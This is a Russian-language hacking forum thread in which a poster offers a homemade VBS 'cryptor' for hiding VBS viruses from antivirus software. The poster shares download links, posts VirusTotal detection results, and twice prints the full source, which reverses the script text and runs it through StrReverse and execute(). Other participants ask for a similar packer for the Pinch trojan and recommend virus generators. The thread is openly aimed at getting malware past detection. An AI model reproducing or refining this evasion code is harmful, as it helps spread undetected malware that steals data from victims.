Сделал криптор vbs файлов, тока после того как сделал, заметил, что каспер,гад, палит,но на вирустотале его палит тока каспер и еще один какой-то левый антивирь, подумал, может кому понадоботся, ща буду пробовать от каспера скрывать. Криптор написан на vbs. http://grob-t.narod.ru/Cryptor.vbs
переделал криптор, теперь на вирустотале все молчит как рыба! качать тут http://grob-t.narod.ru/cryptornew.vbs
непонял, ты имеешь ввиду скомплированный?скоро выложу, только немного переделаю, чтоб имена файлов надо было самому вводить
Вот что говорит вирустотал(остальное чисто) BitDefender 7.2 03.27.2007 Trojan.VBS.Kalmar.Dropper.A (ну и название блин) Ewido 4.0 03.27.2007 Worm.Ancrist Panda 9.0.0.4 03.27.2007 Suspicious file
mm..... а че за вирус в фармате .vbs че он делает этот вирус ? блин кто поможет с хорошим криптором фармата .exe ? мне для Pincha =((((
v1ru$, спасибо, что сказал, видимо, все зависит от самого вируса, когда я на вирустотале проверил вирус, сгенеренный на апокалипсисе со всеми настройками, результат был намного хуже чем у тебя, палил даже каспер Вот обновление http://grob-t.narod.ru/Cryptor.vbs , тот же вирь на апокалипсисе определяют только BitDefender:VBS.Alien.B@mm и McAfee:NewScript, сегодня под вечер, а может и раньше немного изменю криптор, если кто заметил, то первый и второй криптор были совсем разные, короче попробую их скрестить, и кстати v1ru$ что ты такое криптовал у меня ни панда ни Ewido ни разу не вякнули Slapy, vbs вирусы это обычные вирусы делают тоже-самое,что и обычные вирусы написаны на языке Visual Basic Script, если хочешь разобраться скачай какой-нибудь генератор vbs вирусов, их много, русский - apokalipses
Вот очередное обновление: Set FSO = CreateObject("Scripting.FileSystemObject") Set File = FSO.GetFile("C:\temp.vbs")'Тут нужно указать путь к файлу, который надо закриптовать Set TextStream = File.OpenAsTextStream(1) While Not TextStream.AtEndOfStream Str = TextStream.ReadLine() st=st&replace(str,"""","""""") st=st&"""&flrcbv&""" strr=StrReverse(st) Wend TextStream.Close Set TextStream = FSO.CreateTextFile("C:\temp2.vbs")'Сюда будет сохраняться закриптованный файл TextStream.Writeline "a=StrReverse("""&strr&""")"&vbcrlf&"execute(a)" TextStream.Close Правда от BitDefender не удалось скрыть , только от McAfee, а, кстати этот антивирь BitDefender, он популярный или нет?
Вроде бит не очень,но пинчи палит криптованые(если паблик криптор) З.Ы.На вирустотале я проверял сам криптор)
А можеж выложить конечный код (когда уже с формою).Интересно взглянуть. П.С.Я просто практикуюсь на вб, и хотел бы знать как ты ето зделал.
Ето механическая ошибка, я имел ввиду vbs.Дай код плз, а то я парюсь с BrowseForFolder ничо не катит.
2 Dimi4, это и есть код Set FSO = CreateObject("Scripting.FileSystemObject") Set File = FSO.GetFile("C:\temp.vbs")'Тут нужно указать путь к файлу, который надо закриптовать Set TextStream = File.OpenAsTextStream(1) While Not TextStream.AtEndOfStream Str = TextStream.ReadLine() st=st&replace(str,"""","""""") st=st&"""&flrcbv&""" strr=StrReverse(st) Wend TextStream.Close Set TextStream = FSO.CreateTextFile("C:\temp2.vbs")'Сюда будет сохраняться закриптованный файл TextStream.Writeline "a=StrReverse("""&strr&""")"&vbcrlf&"execute(a)" TextStream.Close